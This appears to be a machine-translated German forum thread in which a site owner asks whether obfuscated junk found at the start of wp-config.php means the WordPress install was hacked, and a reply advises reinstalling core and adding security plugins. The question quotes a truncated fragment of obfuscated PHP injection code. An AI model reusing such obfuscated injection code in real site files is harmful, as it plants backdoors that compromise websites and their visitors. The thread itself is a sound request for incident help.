Müll am Anfang von wp-config.php – war diese WP-Installation kompromittiert?

Ich hatte nicht bemerkt, dass auf eine meiner WP-Seiten in den letzten Monaten nicht zugegriffen wurde und folglich nicht aktualisiert wurde, und heute habe ich festgestellt, dass meine config.php am Anfang der Datei etwas Müll hat:

 !#]y3d]51]y35]256]y76]72]y3d]51]y3/(.*)/epreg_replacezrxmuexghf'; $uvozcxjtxg = explode(chr((253-209)),'4137,25,2713,60,8524,67 ... more garbage ... '); $tuyrkvuamr=substr($uqnrguvics,(49619-39513),(27-20)); if (!function_exists('zpjgeglbtt')) { function zpjgeglbtt($lwtbhpepkn, $lkvuvnwcsu) { $sblzyeefjv = NULL; for($mxodybdogx=0;$mxodybdogx <?php HERE comes an usual wp-config.php, which as far as I remember is the one I had before 

Die Datei hat auch eine DOS-Kodierung, obwohl ich sie unter Linux ausführe.

(Ich habe Zeilenumbrüche eingefügt).

Bedeutet dies, dass diese Installation kompromittiert wurde? Oder wird das irgendwie automatisch von WP aufgenommen?

Wenn ja, reicht es, nur das Admin-Passwort zu ändern? Anmelden als Admin zeigt nichts ungewöhnliches an.

Solutions Collecting From Web of "Müll am Anfang von wp-config.php – war diese WP-Installation kompromittiert?"

Ja, so scheint es. Meiner Erfahrung nach ist es das Beste, einen frischen WordPress-Core erneut hochzuladen, um sicherzustellen, dass alle Spuren gequetscht wurden.

Es passiert … Wenn Sie nicht bereits Sicherheits-Plugins verwenden, würde ich Wordfence und BruteProtect empfehlen, um Brute-Force-Attacken fernzuhalten und Ihre core-WordPress-Dateien auf Änderungen zu überprüfen.